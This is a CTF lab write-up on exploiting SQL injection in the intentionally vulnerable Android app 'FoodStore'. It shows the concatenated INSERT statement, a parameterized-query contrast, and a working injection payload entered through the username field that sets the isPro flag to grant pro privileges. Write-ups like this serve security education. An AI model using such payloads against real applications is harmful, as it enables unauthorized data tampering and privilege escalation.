SQL, ANDROID, MOBILE

Mobile Hacking Lab - Food Store

SQL Injection and Privilege Escalation: A Mobile Hacking Lab CTF Challenge

SQL injection weaknesses pose serious challenges, testing the strength of data management procedures. These vulnerabilities expose fundamental flaws in how applications interact with databases, potentially allowing unauthorized access and manipulation of sensitive data. The Mobile Hacking Lab’s challenge, which focuses on a SQL injection flaw within an Android app, provides a valuable opportunity for cybersecurity experts to thoroughly examine such vulnerabilities.

The Challenge Overview

The challenge involves exploiting a SQL injection vulnerability in an Android app named “FoodStore” to upgrade a user’s status from regular to pro. This task requires advanced analysis and strategic thinking, going beyond basic exploitation techniques.

You can access the lab at Mobile Hacking Lab - FoodStore.

Technical Breakdown of the Vulnerable Method

The challenge starts by looking closely at how the app works. I started by decompiling the APK file with APKTool. After the decompiling process, I used jadx-gui to look at the code and started to figure out how the app operates, paying special attention to the sign-up feature.

This showed that the functions addUser and getUserByUsername were key for the app to talk to its database, using SQL to handle user information.

A closer look showed that the addUser function was using user input directly in SQL commands. This is usually a big warning sign for us because it could let hackers inject malicious SQL. The getUserByUsername function also needed a look because it searches the database for user info, showing how the app adds and looks up user data.

The Vulnerable addUser Method

This reveals the core of the SQL injection vulnerability — the concatenation of user inputs directly into an SQL command. This practice opens a door to manipulate the SQL statement, enabling unauthorized actions such as data tamperering or privilege escalation.

String sql = "INSERT INTO users (username, password, address, isPro) VALUES ('" + Username + "', '" + encodedPassword + "', '" + encodedAddress + "', 0)";

Secure Coding Contrast: The getUserByUsername Method

This method illustrates a secure approach by leveraging parameterized queries, effectively neutralizing the risk of SQL injection by separating user input from the query execution logic.

Cursor cursor = db.query("users", new String[]{"id", "username", "password", "address", "isPro"}, "username = ?", new String[]{Username}, null, null, null);

The Exploitation Strategy

My goal was to exploit the vulnerability in addUser to escalate a user’s privilege. The intended exploit involved manipulating the isPro flag by injecting SQL through the username input field.

Exploitation Injection Vector

Initial exploit attempts focused on injecting an SQL segment through the username field in a format similar to:

'admin', 'encodedPassword', 'encodedAddress', 1); --

This injection was designed to terminate the original INSERT statement prematurely and append a manipulated segment setting, the isPro flag to 1, thereby elevating the user’s privileges!

Challenge in Exploitation

The successful injection, which effectively elevated a user’s privilege to that of a pro user within the application’s database, was crafted as follows:

admin','YWRtaW4=','YWRtaW4',1); --"

This payload was designed to exploit the SQL injection vulnerability within the addUser method. By inserting a crafted string into the username field, I was able to manipulate the SQL command executed by the application.

The payload terminates the original INSERT INTO statement prematurely and appends a new, malicious statement that inserts a user with pro privileges into the database. The encoded values 'YWRtaW4=' and 'YWRtaW4' represent the Base64 encoded password and address (decoded value= admin), to respect the application’s data handling conventions.

The inclusion of 1); --" at the end of the payload is where the money is. The 1 sets the isPro flag to true, effectively granting administrative access. After, the ); closes the insertion command, and the -- comments out the remainder of the original SQL statement, ensuring that any subsequent part of the query does not interfere with the execution of the payload.

We can now login as admin and we have the Pro User privilege!

Conclusion

Going through the SQL injection challenge was really fun. It taught us a lot about the big security holes that can put mobile app safety at risk. We looked closely at how to break the app using a SQL injection to change a user’s status from regular to pro.

The challenge reaffirms the necessity for developers to employ parameterized queries, rigorously validate and sanitize user inputs, and continuously update their knowledge of security best practices. For cybersecurity practitioners, it serves as a reminder of the constant vigilance required to protect against evolving threats in the mobile ecosystem.